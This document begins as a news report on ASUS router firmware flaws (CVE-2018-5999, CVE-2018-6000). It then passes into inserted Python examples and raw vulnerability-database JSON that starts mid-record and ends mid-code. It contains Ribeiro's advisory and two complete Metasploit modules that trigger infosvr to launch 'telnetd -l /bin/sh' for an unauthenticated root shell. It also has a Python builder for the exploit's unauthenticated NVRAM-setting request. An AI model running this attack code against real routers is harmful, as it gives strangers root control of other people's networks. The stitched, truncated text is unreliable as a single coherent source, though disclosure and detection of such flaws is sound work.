ASUS released patches on Tuesday for over a dozen router models, each of which is vulnerable to multiple firmware flaws that, when combined, give a local unauthenticated attacker the ability to execute commands as root on targeted devices.
Router models patched by ASUS include the RT-AC88U, RT-AC3100, RT-AC86U, RT-AC68U and RT-AC66U. The flaws are in the ASUS firmware AsusWRT (versions before 3.0.0.4.384_10007), used in select models of the company’s router lines.
“The attack is done from the LAN side of the network, as opposed to the WAN side. In other words, as far as we know you cannot exploit this from the internet,” according to network security firm Beyond Security, which disclosed the vulnerabilities [earlier this week](<https://blogs.securiteam.com/index.php/archives/3589>). “This (attack) works for someone in your LAN – even if they are on a guest network – and it may lead to remote command execution.”
The two vulnerabilities are CVE-2018-6000, a configuration manipulation flaw, and CVE-2018-5999, a server authentication bypass flaw.
“Due to a number of coding errors, it is possible for an unauthenticated attacker in the LAN to achieve remote code execution in the router as the root user,” [wrote researcher Pedro Ribeiro](<https://github.com/pedrib/PoC/blob/master/advisories/asuswrt-lan-rce.txt>), who discovered the flaws.
The first flaw (CVE-2018-5999) lies in the AsusWRT HTTP server and the way it handles requests in “handle_request()”, which allows an unauthenticated user to perform a POST request for certain actions, according to Ribeiro.
“This can (and will) be combined with other vulnerabilities to achieve remote code execution,” he said.
Ribeiro describes the second bug (CVE-2018-6000) as an unauthorized configuration change flaw tied to the router’s nonvolatile random access memory (NVRAM).
“By abusing vulnerability #1 and POSTing to vpnupload.cgi, we can invoke do_vpnupload_post() in the HTTP server code, which has a vulnerability (CVE-2018-5999) that allows an attacker to set NVRAM configuration values directly from the request,” he said.
According to Ribeiro’s technical write-up, the NVRAM values include the admin password. An attacker can therefore manipulate, change or set NVRAM values such as the admin password to whatever they want.
“Once that is done, code execution is easily achieved. One option is to log in to the web interface with the new password, enable SSH, reboot the router and log in via SSH,” he said. SSH is shorthand for Secure Socket Shell, a network protocol that provides administrators (or attackers) a secure way to access a remote computer for remote management or manipulation.
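The ordering bug behind this chain is easier to see in a small model. The Python below is an added example (not code from the article, from Ribeiro's advisory or from AsusWRT): it contrasts a dispatcher that still hands an unauthenticated POST body to the request handler before sending the login page with a hardened one that lets the authorization decision gate every handler. The `Request` type, the handler table and the NVRAM key name `admin_password` are constructed for illustration and are not real AsusWRT identifiers.

```python
# Added example: a Python model of the request-dispatch ordering the article
# describes. Names (Request, HANDLERS, the NVRAM key) are constructed.
from dataclasses import dataclass, field


@dataclass
class Request:
    method: str
    url: str
    authorized: bool                             # stands in for a valid session/auth header
    fields: dict = field(default_factory=dict)   # multipart form fields, already parsed


def vpnupload_input(req: Request, nvram: dict) -> None:
    """Models the VPN-upload POST handler: every form field other than the
    uploaded file is written straight into NVRAM (the CVE-2018-6000 behaviour)."""
    for name, value in req.fields.items():
        if name != "file":
            nvram[name] = value


HANDLERS = {"/vpnupload.cgi": vpnupload_input}   # only the handler this page discusses


def handle_request_vulnerable(req: Request, nvram: dict) -> str:
    """Models the pre-3.0.0.4.384_10007 flow: when auth fails, a POST body is
    still passed to the handler and only then is the login page sent."""
    if not req.authorized:
        if req.method.upper() == "POST" and req.url in HANDLERS:
            HANDLERS[req.url](req, nvram)        # body processed despite failed auth
        return "login_page"
    if req.method.upper() == "POST" and req.url in HANDLERS:
        HANDLERS[req.url](req, nvram)
    return "ok"


def handle_request_fixed(req: Request, nvram: dict) -> str:
    """Hardened ordering: the authorization check precedes any handler, so an
    unauthenticated POST body is discarded rather than dispatched."""
    if not req.authorized:
        return "login_page"
    if req.method.upper() == "POST" and req.url in HANDLERS:
        HANDLERS[req.url](req, nvram)
    return "ok"


def run_scenario(dispatch) -> dict:
    """Drive one dispatcher with a constructed NVRAM store and an unauthenticated
    POST that tries to overwrite the constructed admin-password key."""
    nvram = {"admin_password": "original"}       # constructed key, not a real AsusWRT variable
    req = Request("POST", "/vpnupload.cgi", authorized=False,
                  fields={"admin_password": "changed"})
    response = dispatch(req, nvram)
    return {"response": response, "admin_password": nvram["admin_password"]}


if __name__ == "__main__":
    print("vulnerable:", run_scenario(handle_request_vulnerable))
    print("fixed:     ", run_scenario(handle_request_fixed))
```

Both dispatchers answer the unauthenticated request with the login page; only the vulnerable one has already changed NVRAM by the time it does.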
The attack scenario can vary; for example, an attacker could abuse ASUS’ own service “infosvr”, which listens on UDP broadcast port 9999 on the LAN or WLAN interface, writes Ribeiro. The infosvr service has also been the target of previous attack methods ([CVE-2014-9583](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-9583>)).
The vulnerabilities were disclosed earlier this week by network security firm Beyond Security and were part of the company’s SecuriTeam Secure Disclosure program.
According to Beyond Security, ASUS was notified of the vulnerabilities on Nov. 22. The vulnerabilities are being patched by ASUS via automatic updates sent to affected routers, according to Beyond Security.
A complete list of affected routers, according to ASUS, includes:
- RT-AC88U 3.0.0.4.384_10007
- RT-AC3100 3.0.0.4.384_10007
- RT-AC86U 3.0.0.4.384_10007
- RT-AC68U series 3.0.0.4.384_10007, which also includes RT-AC68U/ 68R/ 68W/ AC1900/ 68U_White/ 68P/ 1900P/ 1900U
- RT-AC66U_B1 series 3.0.0.4.384_10007, which also includes AC1750_B1
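A practitioner with several of these routers in inventory wants a repeatable check against this list. The Python below is an added example (not code from the article or from ASUS): it parses AsusWRT build strings, which ASUS writes with both `.` and `_` as separators, and reports which devices are on the article's affected list and still run a build older than 3.0.0.4.384_10007. Expanding the short aliases in the list (68R, AC1900, AC1750_B1 and so on) to full model names with an `RT-AC` prefix is an assumption, and the inventory rows are constructed sample data.

```python
# Added example: inventory check against the affected list in this article.
# The alias expansion (RT-AC prefix) is assumed; SAMPLE_INVENTORY is constructed.
import re

PATCHED_VERSION = "3.0.0.4.384_10007"   # build named in the article's affected list

# Affected families and the variants the article lists under each of them.
AFFECTED_FAMILIES = {
    "RT-AC88U": ("RT-AC88U",),
    "RT-AC3100": ("RT-AC3100",),
    "RT-AC86U": ("RT-AC86U",),
    "RT-AC68U": ("RT-AC68U", "RT-AC68R", "RT-AC68W", "RT-AC1900",
                 "RT-AC68U_WHITE", "RT-AC68P", "RT-AC1900P", "RT-AC1900U"),
    "RT-AC66U_B1": ("RT-AC66U_B1", "RT-AC1750_B1"),
}


def parse_version(v: str) -> tuple:
    """Turn a build string such as '3.0.0.4.384_10007' or '3.0.0.4.380.7743'
    into a tuple of integers for numeric comparison. A truncated string
    (e.g. '3.0.0.4.384') compares as older, which errs on the side of flagging."""
    parts = re.split(r"[._]", v.strip())
    if not parts or not all(p.isdigit() for p in parts):
        raise ValueError(f"unrecognised AsusWRT build string: {v!r}")
    return tuple(int(p) for p in parts)


def affected_family(model: str):
    """Map a model name (any case, spaces ignored) to its affected family, or None."""
    m = re.sub(r"\s+", "", model).upper()
    for family, aliases in AFFECTED_FAMILIES.items():
        if m in aliases:
            return family
    return None


def needs_patch(model: str, version: str) -> bool:
    """True when the model is on the article's list and runs an older build than
    the patched one. Models not on the list are not judged either way here."""
    if affected_family(model) is None:
        return False
    return parse_version(version) < parse_version(PATCHED_VERSION)


def assess_inventory(rows):
    """Return the (host, model, version) rows that still need the update."""
    return [(host, model, version) for host, model, version in rows
            if needs_patch(model, version)]


# Constructed sample inventory: hostnames and the 3.0.0.4.382_50624 build are made up.
SAMPLE_INVENTORY = [
    ("gw-lab-1", "RT-AC68U", "3.0.0.4.380.7743"),
    ("gw-lab-2", "RT-AC88U", "3.0.0.4.384_10007"),
    ("gw-guest", "RT-AC1900P", "3.0.0.4.382_50624"),
    ("gw-old", "RT-N66U", "3.0.0.4.380.7743"),
]

if __name__ == "__main__":
    for host, model, version in assess_inventory(SAMPLE_INVENTORY):
        print(f"{host}: {model} on {version} needs {PATCHED_VERSION} or later")
```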
"href": "https://www.exploit-db.com/exploits/43881", "sourceData": ">> Unauthenticated LAN remote code execution in AsusWRT\r\n>> Discovered by Pedro Ribeiro (pedrib@gmail.com), Agile Information Security\r\n=================================================================================\r\nDisclosure: 22/01/2018 / Last updated: 25/01/2018\r\n\r\n\r\n>> Background and summary\r\nAsusWRT is the operating system used in mid range and high end Asus routers. It is based on Linux, but with a sleek web UI and a slimmed down profile suitable for running on resource constrained routers.\r\nThankfully ASUS is a responsible company, and not only they publish the full source code as required by the GPL, but they also give users full root access to their router via SSH. Overall the security of their operating system is pretty good, especially when compared to other router manufacturers.\r\n\r\nHowever due to a number of coding errors, it is possible for an unauthenticated attacker in the LAN to achieve remote code execution in the router as the root user.\r\n\r\nA special thanks to Beyond Security SecuriTeam Secure Disclosure (SSD) programme for disclosing these vulnerabilities to the manufacturer, speeding the resolution of the issues discovered (see [1] for their advisory).\r\n\r\n\r\n>> Technical details:\r\n#1\r\nVulnerability: HTTP server authentication bypass\r\nCVE-2018-5999\r\nAttack Vector: Remote\r\nConstraints: None; exploitable by an unauthenticated attacker\r\nAffected versions: confirmed on v3.0.0.4.380.7743; possibly affects every version before v3.0.0.4.384.10007\r\n\r\nThe AsusWRT HTTP server has a flaw in handle_request() that allows an unauthenticated user to perform a POST request for certain actions.\r\nIn AsusWRT_source/router/httpd/httpd.c:\r\n\r\nhandle_request(void)\r\n{\r\n...\r\n\thandler->auth(auth_userid, auth_passwd, auth_realm);\r\n\tauth_result = auth_check(auth_realm, authorization, url, file, cookies, fromapp);\r\n\r\n\tif (auth_result != 0) 
<--- auth fails\r\n\t{\r\n\t\tif(strcasecmp(method, \"post\") == 0){\r\n\t\t\tif (handler->input) {\r\n\t\t\t\thandler->input(file, conn_fp, cl, boundary); <--- but POST request is still processed\r\n\t\t\t}\r\n\t\t\tsend_login_page(fromapp, auth_result, NULL, NULL, 0);\r\n\t\t}\r\n\t\t//if(!fromapp) http_logout(login_ip_tmp, cookies);\r\n\t\treturn;\r\n\t}\r\n...\r\n}\r\n\r\nThis can (and will) be combined with other vulnerabilities to achieve remote code execution.\r\n\r\n\r\n#2\r\nVulnerability: Unauthorised configuration change (NVRAM value setting)\r\nCVE-2018-6000\r\nAttack Vector: Remote\r\nConstraints: None; exploitable by an unauthenticated attacker\r\nAffected versions: confirmed on v3.0.0.4.380.7743; possibly affects every version before v3.0.0.4.384.10007\r\n\r\nBy abusing vulnerability #1 and POSTing to vpnupload.cgi, we can invoke do_vpnupload_post() in the HTTP server code, which has a vulnerability that allows an attacker to set NVRAM configuration values directly from the request.\r\nIn AsusWRT_source/router/httpd/web.c:\r\n\r\ndo_vpnupload_post(char *url, FILE *stream, int len, char *boundary)\r\n{\r\n...\r\n\tif (!strncasecmp(post_buf, \"Content-Disposition:\", 20)) {\r\n\t\tif(strstr(post_buf, \"name=\\\"file\\\"\"))\r\n\t\t\tbreak;\r\n\t\telse if(strstr(post_buf, \"name=\\\"\")) {\r\n\t\t\toffset = strlen(post_buf);\r\n\t\t\tfgets(post_buf+offset, MIN(len + 1, sizeof(post_buf)-offset), stream);\r\n\t\t\tlen -= strlen(post_buf) - offset;\r\n\t\t\toffset = strlen(post_buf);\r\n\t\t\tfgets(post_buf+offset, MIN(len + 1, sizeof(post_buf)-offset), stream);\r\n\t\t\tlen -= strlen(post_buf) - offset;\r\n\t\t\tp = post_buf;\r\n\t\t\tname = strstr(p, \"\\\"\") + 1;\r\n\t\t\tp = strstr(name, \"\\\"\");\r\n\t\t\tstrcpy(p++, \"\\0\");\r\n\t\t\tvalue = strstr(p, \"\\r\\n\\r\\n\") + 4;\r\n\t\t\tp = strstr(value, \"\\r\");\r\n\t\t\tstrcpy(p, \"\\0\");\r\n\t\t\t//printf(\"%s=%s\\n\", name, value);\r\n\t\t\tnvram_set(name, 
value);\r\n\t\t}\r\n\t}\r\n...\r\n}\r\n\r\nThese NVRAM values contain very important configuration variables, such as the admin password, which can be set in this way by an authenticated or unauthenticated attacker.\r\n\r\nOnce that is done, code execution is easily achieved. One option is to login to the web interface with the new password, enable SSH, reboot the router and login via SSH.\r\n\r\nA more elegant option is to abuse infosvr, which is a UDP daemon running on port 9999.\r\nThe daemon has a special mode where it executes a command received in a packet as the root user. This special mode is only enabled if ateCommand_flag is set to 1, which most likely only happens during factory testing or QA (it was not enabled by default in the firmware distributed by Asus in their website).\r\n\r\nHowever we can set ateCommand_flag to 1 using the VPN configuration upload technique described above and then send a PKT_SYSCMD to infosvr. The daemon will read a command from the packet and execute it as root, achieving our command execution cleanly - without changing any passwords.\r\n\r\n(Note: infosvr used to allow unauthenticated command execution without the ateCommand_flag being set, which led to Joshua Drake's (jduck) discovery of CVE-2014-9583, see [2]; this was fixed by Asus in early 2015).\r\n\r\nPacket structure (from AsusWRT_source/router/shared/iboxcom.h):\r\n- Header\r\n typedef struct iboxPKTEx\r\n {\r\n BYTE\t\tServiceID;\r\n BYTE\t\tPacketType;\r\n WORD\t\tOpCode;\r\n DWORD \t\tInfo; // Or Transaction ID\r\n BYTE\t\tMacAddress[6];\r\n BYTE\t\tPassword[32]; //NULL terminated string, string length:1~31, cannot be NULL string\r\n } ibox_comm_pkt_hdr_ex;\r\n\r\n- Body\r\n typedef struct iboxPKTCmd\r\n {\r\n WORD\t\tlen;\r\n BYTE\t\tcmd[420];\t\t<--- command goes here\r\n } PKT_SYSCMD;\t\t// total 422 bytes\r\n\r\nA Metasploit module exploiting this vulnerability has been released [3].\r\n\r\n\r\n>> Fix:\r\nUpgrade to AsusWRT v3.0.0.4.384.10007 or above.\r\nSee 
[4] for the very few details and new firmware released by Asus.\r\n\r\n\r\n>> References:\r\n[1] https://blogs.securiteam.com/index.php/archives/3589\r\n[2] https://github.com/jduck/asus-cmd\r\n[3] https://raw.githubusercontent.com/pedrib/PoC/master/exploits/metasploit/asuswrt_lan_rce.rb\r\n[4] https://www.asus.com/Static_WebPage/ASUS-Product-Security-Advisory/\r\n\r\n================\r\nAgile Information Security Limited\r\nhttp://www.agileinfosec.co.uk/\r\n>> Enabling secure digital business >>", "sourceHref": "https://www.exploit-db.com/raw/43881", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "zdt": [{"lastseen": "2018-03-09T16:09:48", "description": "The HTTP server in AsusWRT has a flaw where it allows an unauthenticated client to perform a POST in certain cases. This can be combined with another vulnerability in the VPN configuration upload routine that sets NVRAM configuration variables directly from the POST request to enable a special command mode. This command mode can then be abused by sending a UDP packet to infosvr, which is running on port UDP 9999 to directly execute commands as root. This exploit leverages that to start telnetd in a random port, and then connects to it. 
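
The vpnupload.cgi write that the advisory above and the Metasploit module on this page describe, as an added example in Python (the language RouterSploit's port of this exploit uses) rather than code from the page, AsusWRT, Metasploit or RouterSploit. It builds the same unauthenticated multipart/form-data POST the module sends, then parses captured request bytes with a Python model of the do_vpnupload_post() field extraction so a LAN sensor can report which NVRAM keys a client tried to set. The NVRAM names http_username, http_passwd and sshd_enable are assumed AsusWRT variable names (only ateCommand_flag appears on this page); sample requests are constructed inline and nothing is sent.

```python
"""Builder and detector for the vpnupload.cgi NVRAM-setting request.

Added example, not code from the page or from AsusWRT, Metasploit or
RouterSploit. CVE-2018-5999 lets an unauthenticated POST reach the handler;
the do_vpnupload_post() loop quoted on the page then calls nvram_set(name,
value) for every named part before the file part (CVE-2018-6000). The regex
below is a Python model of that C extraction, not the router code itself.
"""
import re
import secrets

# NVRAM keys worth a critical alert when written through this path.
# ateCommand_flag is on the page; the other three are assumed AsusWRT names
# for the web credentials and the SSH daemon switch.
SENSITIVE_KEYS = {'ateCommand_flag', 'http_username', 'http_passwd', 'sshd_enable'}

# One multipart part: the Content-Disposition line carrying name="...",
# any further header lines, a blank line, then the first line of the value.
# do_vpnupload_post() reads exactly that and cuts the value at the first '\r'.
_PART_RE = re.compile(
    rb'Content-Disposition:[^\r\n]*?name="(?P<name>[^"]*)"[^\r\n]*\r\n'
    rb'(?:[^\r\n]+\r\n)*'
    rb'\r\n'
    rb'(?P<value>[^\r\n]*)'
)


def build_vpnupload_request(host, nvram_pairs, boundary=None):
    """Raw HTTP/1.1 request bytes that set each (name, value) pair in NVRAM.

    No Authorization header or cookie is included: on vulnerable builds
    handle_request() still runs handler->input() when auth_check() fails.
    """
    boundary = boundary or secrets.token_hex(8)
    parts = ''.join(
        f'--{boundary}\r\n'
        f'Content-Disposition: form-data; name="{name}"\r\n'
        f'\r\n{value}\r\n'
        for name, value in nvram_pairs
    )
    body = parts + f'--{boundary}--\r\n'
    head = (
        'POST /vpnupload.cgi HTTP/1.1\r\n'
        f'Host: {host}\r\n'
        f'Content-Type: multipart/form-data; boundary={boundary}\r\n'
        f'Content-Length: {len(body)}\r\n'
        '\r\n'
    )
    return (head + body).encode()


def extract_nvram_sets(request):
    """Model of the do_vpnupload_post() loop over one captured request.

    Returns the (name, value) pairs the router would hand to nvram_set().
    Parsing stops at the part named "file", where the C loop breaks.
    Anything that is not a POST to /vpnupload.cgi yields an empty list.
    """
    head, _, body = request.partition(b'\r\n\r\n')
    request_line = head.split(b'\r\n', 1)[0]
    if not request_line.startswith(b'POST ') or b'/vpnupload.cgi' not in request_line:
        return []
    pairs = []
    for part in _PART_RE.finditer(body):
        name = part.group('name').decode('ascii', 'replace')
        if name == 'file':
            break
        pairs.append((name, part.group('value').decode('ascii', 'replace')))
    return pairs


def classify_request(request):
    """Detection verdict for one request, or None when it is not of interest.

    An NVRAM write through vpnupload.cgi from a client that presented no
    credentials at all is the CVE-2018-5999 + CVE-2018-6000 pattern; writes
    to SENSITIVE_KEYS are critical even when credentials were presented.
    """
    sets = extract_nvram_sets(request)
    if not sets:
        return None
    head = request.partition(b'\r\n\r\n')[0].lower()
    has_credentials = b'\r\nauthorization:' in head or b'\r\ncookie:' in head
    touched = {name for name, _ in sets}
    severity = 'critical' if (not has_credentials or touched & SENSITIVE_KEYS) else 'medium'
    return {'severity': severity, 'credentials_presented': has_credentials, 'nvram': dict(sets)}


if __name__ == '__main__':
    # Constructed sample: the first write the exploit chain makes.
    sample = build_vpnupload_request('192.168.1.1', [('ateCommand_flag', '1')])
    print(classify_request(sample))
```

Feed `classify_request()` the reassembled request from a LAN-side HTTP capture; a `critical` verdict with `credentials_presented` false is the chain in progress, and `nvram` tells you what was changed so it can be reverted after the firmware upgrade.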
It has been tested with the RT-AC68U running AsusWRT Version 3.0.0.4.380.7743.", "cvss3": {}, "published": "2018-02-23T00:00:00", "type": "zdt", "title": "AsusWRT LAN Unauthenticated Remote Code Execution Exploit", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2018-5999", "CVE-2018-6000"], "modified": "2018-02-23T00:00:00", "id": "1337DAY-ID-29883", "href": "https://0day.today/exploit/description/29883", "sourceData": "##\r\n# This module requires Metasploit: http://metasploit.com/download\r\n# Current source: https://github.com/rapid7/metasploit-framework\r\n##\r\n\r\nclass MetasploitModule < Msf::Exploit::Remote\r\n Rank = ExcellentRanking\r\n\r\n include Msf::Exploit::Remote::HttpClient\r\n include Msf::Exploit::Remote::Udp\r\n\r\n def initialize(info = {})\r\n super(update_info(info,\r\n 'Name' => 'AsusWRT LAN Unauthenticated Remote Code Execution',\r\n 'Description' => %q{\r\n The HTTP server in AsusWRT has a flaw where it allows an unauthenticated client to\r\n perform a POST in certain cases. 
This can be combined with another vulnerability in\r\n the VPN configuration upload routine that sets NVRAM configuration variables directly\r\n from the POST request to enable a special command mode.\r\n This command mode can then be abused by sending a UDP packet to infosvr, which is running\r\n on port UDP 9999 to directly execute commands as root.\r\n This exploit leverages that to start telnetd in a random port, and then connects to it.\r\n It has been tested with the RT-AC68U running AsusWRT Version 3.0.0.4.380.7743.\r\n },\r\n 'Author' =>\r\n [\r\n 'Pedro Ribeiro <[email\u00a0protected]>' # Vulnerability discovery and Metasploit module\r\n ],\r\n 'License' => MSF_LICENSE,\r\n 'References' =>\r\n [\r\n ['URL', 'https://blogs.securiteam.com/index.php/archives/3589'],\r\n ['URL', 'https://raw.githubusercontent.com/pedrib/PoC/master/advisories/asuswrt-lan-rce.txt'],\r\n ['URL', 'http://seclists.org/fulldisclosure/2018/Jan/78'],\r\n ['CVE', '2018-5999'],\r\n ['CVE', '2018-6000']\r\n ],\r\n 'Targets' =>\r\n [\r\n [ 'AsusWRT < v3.0.0.4.384.10007',\r\n {\r\n 'Payload' =>\r\n {\r\n 'Compat' => {\r\n 'PayloadType' => 'cmd_interact',\r\n 'ConnectionType' => 'find',\r\n },\r\n },\r\n }\r\n ],\r\n ],\r\n 'Privileged' => true,\r\n 'Platform' => 'unix',\r\n 'Arch' => ARCH_CMD,\r\n 'DefaultOptions' => { 'PAYLOAD' => 'cmd/unix/interact' },\r\n 'DisclosureDate' => 'Jan 22 2018',\r\n 'DefaultTarget' => 0))\r\n register_options(\r\n [\r\n Opt::RPORT(9999)\r\n ])\r\n\r\n register_advanced_options(\r\n [\r\n OptInt.new('ASUSWRTPORT', [true, 'AsusWRT HTTP portal port', 80])\r\n ])\r\n end\r\n\r\n def exploit\r\n # first we set the ateCommand_flag variable to 1 to allow PKT_SYSCMD\r\n # this attack can also be used to overwrite the web interface password and achieve RCE by enabling SSH and rebooting!\r\n post_data = Rex::MIME::Message.new\r\n post_data.add_part('1', content_type = nil, transfer_encoding = nil, content_disposition = \"form-data; 
name=\\\"ateCommand_flag\\\"\")\r\n\r\n data = post_data.to_s\r\n\r\n res = send_request_cgi({\r\n 'uri' => \"/vpnupload.cgi\",\r\n 'method' => 'POST',\r\n 'rport' => datastore['ASUSWRTPORT'],\r\n 'data' => data,\r\n 'ctype' => \"multipart/form-data; boundary=#{post_data.bound}\"\r\n })\r\n\r\n if res and res.code == 200\r\n print_good(\"#{peer} - Successfully set the ateCommand_flag variable.\")\r\n else\r\n fail_with(Failure::Unknown, \"#{peer} - Failed to set ateCommand_flag variable.\")\r\n end\r\n\r\n\r\n # ... but we like to do it more cleanly, so let's send the PKT_SYSCMD as described in the comments above.\r\n info_pdu_size = 512 # expected packet size, not sure what the extra bytes are\r\n r = Random.new\r\n\r\n ibox_comm_pkt_hdr_ex =\r\n [0x0c].pack('C*') + # NET_SERVICE_ID_IBOX_INFO 0xC\r\n [0x15].pack('C*') + # NET_PACKET_TYPE_CMD 0x15\r\n [0x33,0x00].pack('C*') + # NET_CMD_ID_MANU_CMD 0x33\r\n r.bytes(4) + # Info, don't know what this is\r\n r.bytes(6) + # MAC address\r\n r.bytes(32) # Password\r\n\r\n telnet_port = rand((2**16)-1024)+1024\r\n cmd = \"/usr/sbin/telnetd -l /bin/sh -p #{telnet_port}\" + [0x00].pack('C*')\r\n pkt_syscmd =\r\n [cmd.length,0x00].pack('C*') + # cmd length\r\n cmd # our command\r\n\r\n pkt_final = ibox_comm_pkt_hdr_ex + pkt_syscmd + r.bytes(info_pdu_size - (ibox_comm_pkt_hdr_ex + pkt_syscmd).length)\r\n\r\n connect_udp\r\n udp_sock.put(pkt_final) # we could process the response, but we don't care\r\n disconnect_udp\r\n\r\n print_status(\"#{peer} - Packet sent, let's sleep 10 seconds and try to connect to the router on port #{telnet_port}\")\r\n sleep(10)\r\n\r\n begin\r\n ctx = { 'Msf' => framework, 'MsfExploit' => self }\r\n sock = Rex::Socket.create_tcp({ 'PeerHost' => rhost, 'PeerPort' => telnet_port, 'Context' => ctx, 'Timeout' => 10 })\r\n if not sock.nil?\r\n print_good(\"#{peer} - Success, shell incoming!\")\r\n return handler(sock)\r\n end\r\n rescue Rex::AddressInUse, ::Errno::ETIMEDOUT, Rex::HostUnreachable, 
Rex::ConnectionTimeout, Rex::ConnectionRefused, ::Timeout::Error, ::EOFError => e\r\n sock.close if sock\r\n end\r\n\r\n print_bad(\"#{peer} - Well that didn't work... try again?\")\r\n end\r\nend\n\n# 0day.today [2018-03-09] #", "sourceHref": "https://0day.today/exploit/29883", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-04-22T22:06:03", "description": "This Metasploit module exploits an authentication bypass vulnerability in the infosvr service running on UDP port 9999 on various ASUS routers to execute arbitrary commands as root. This Metasploit module launches the BusyBox Telnet daemon on the port specified in the TelnetPort option to gain an interactive remote shell. This Metasploit module was tested successfully on an ASUS RT-N12E with firmware version 2.0.0.35. Numerous ASUS models are reportedly affected, but untested.", "cvss3": {}, "published": "2018-04-22T00:00:00", "type": "zdt", "title": "ASUS infosvr Authentication Bypass Command Execution Exploit", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2014-9583"], "modified": "2018-04-22T00:00:00", "id": "1337DAY-ID-30222", "href": "https://0day.today/exploit/description/30222", "sourceData": "##\r\n# This module requires Metasploit: http://metasploit.com/download\r\n# Current source: https://github.com/rapid7/metasploit-framework\r\n##\r\n\r\nclass MetasploitModule < Msf::Exploit::Remote\r\n Rank = ExcellentRanking\r\n\r\n include Msf::Exploit::Remote::Udp\r\n\r\n def initialize(info = {})\r\n super(update_info(info,\r\n 'Name' => 'ASUS infosvr Auth Bypass Command Execution',\r\n 'Description' => %q{\r\n This module exploits an authentication bypass vulnerability in the\r\n infosvr service running on UDP port 9999 on various ASUS routers to\r\n execute arbitrary commands as root.\r\n\r\n This module launches the BusyBox Telnet daemon on the port specified\r\n in the TelnetPort option to gain an interactive remote 
shell.\r\n\r\n This module was tested successfully on an ASUS RT-N12E with firmware\r\n version 2.0.0.35.\r\n\r\n Numerous ASUS models are reportedly affected, but untested.\r\n },\r\n 'Author' =>\r\n [\r\n 'Friedrich Postelstorfer', # Initial public disclosure and Python exploit\r\n 'jduck', # Independent discovery and C exploit\r\n 'Brendan Coles <bcoles[at]gmail.com>' # Metasploit\r\n ],\r\n 'License' => MSF_LICENSE,\r\n 'Platform' => 'unix',\r\n 'References' =>\r\n [\r\n ['CVE', '2014-9583'],\r\n ['EDB', '35688'],\r\n ['URL', 'https://github.com/jduck/asus-cmd']\r\n ],\r\n 'DisclosureDate' => 'Jan 4 2015',\r\n 'Privileged' => true,\r\n 'Arch' => ARCH_CMD,\r\n 'Payload' =>\r\n {\r\n 'Compat' => {\r\n 'PayloadType' => 'cmd_interact',\r\n 'ConnectionType' => 'find'\r\n }\r\n },\r\n 'Targets' => [['Automatic', {}]],\r\n 'DefaultTarget' => 0))\r\n register_options [\r\n Opt::RPORT(9999),\r\n OptInt.new('TelnetPort', [true, 'The port for Telnetd to bind', 4444]),\r\n OptInt.new('TelnetTimeout', [true, 'The number of seconds to wait for connection to telnet', 10]),\r\n OptInt.new('TelnetBannerTimeout', [true, 'The number of seconds to wait for the telnet banner', 25])\r\n ]\r\n register_advanced_options [\r\n # If the session is killed (CTRL+C) rather than exiting cleanly,\r\n # the telnet port remains open, but is unresponsive, and prevents\r\n # re-exploitation until the device is rebooted.\r\n OptString.new('CommandShellCleanupCommand', [true, 'A command to run before the session is closed', 'exit'])\r\n ]\r\n end\r\n\r\n def telnet_timeout\r\n (datastore['TelnetTimeout'] || 10)\r\n end\r\n\r\n def telnet_port\r\n datastore['TelnetPort']\r\n end\r\n\r\n def request(cmd)\r\n pkt = ''\r\n # ServiceID [byte] ; NET_SERVICE_ID_IBOX_INFO\r\n pkt << \"\\x0C\"\r\n # PacketType [byte] ; NET_PACKET_TYPE_CMD\r\n pkt << \"\\x15\"\r\n # OpCode [word] ; NET_CMD_ID_MANU_CMD\r\n pkt << \"\\x33\\x00\"\r\n # Info [dword] ; Comment: \"Or Transaction ID\"\r\n pkt << 
Rex::Text.rand_text_alphanumeric(4)\r\n # MacAddress [byte[6]] ; Double-wrongly \"checked\" with memcpy instead of memcmp\r\n pkt << Rex::Text.rand_text_alphanumeric(6)\r\n # Password [byte[32]] ; Not checked at all\r\n pkt << \"\\x00\" * 32\r\n # Command Length + \\x00 + Command padded to 512 bytes\r\n pkt << ([cmd.length].pack('C') + \"\\x00\" + cmd).ljust((512 - pkt.length), \"\\x00\")\r\n end\r\n\r\n def exploit\r\n connect_udp\r\n print_status \"#{rhost} - Starting telnetd on port #{telnet_port}...\"\r\n udp_sock.put request \"telnetd -l /bin/sh -p #{telnet_port}\"\r\n disconnect_udp\r\n\r\n vprint_status \"#{rhost} - Waiting for telnet service to start on port #{telnet_port}...\"\r\n Rex.sleep 3\r\n\r\n vprint_status \"#{rhost} - Connecting to #{rhost}:#{telnet_port}...\"\r\n\r\n sock = Rex::Socket.create_tcp 'PeerHost' => rhost,\r\n 'PeerPort' => telnet_port,\r\n 'Context' => { 'Msf' => framework, 'MsfExploit' => self },\r\n 'Timeout' => telnet_timeout\r\n\r\n if sock.nil?\r\n fail_with Failure::Unreachable, \"Telnet service unreachable on port #{telnet_port}\"\r\n end\r\n\r\n vprint_status \"#{rhost} - Trying to establish a telnet session...\"\r\n\r\n prompt = negotiate_telnet sock\r\n if prompt.nil?\r\n sock.close\r\n fail_with Failure::Unknown, 'Unable to establish a telnet session'\r\n end\r\n\r\n print_good \"#{rhost} - Telnet session successfully established...\"\r\n\r\n handler sock\r\n end\r\n\r\n def negotiate_telnet(sock)\r\n prompt = '#'\r\n Timeout.timeout(datastore['TelnetBannerTimeout']) do\r\n while true\r\n data = sock.get_once(-1, telnet_timeout)\r\n if !data or data.length == 0\r\n return nil\r\n elsif data.include? 
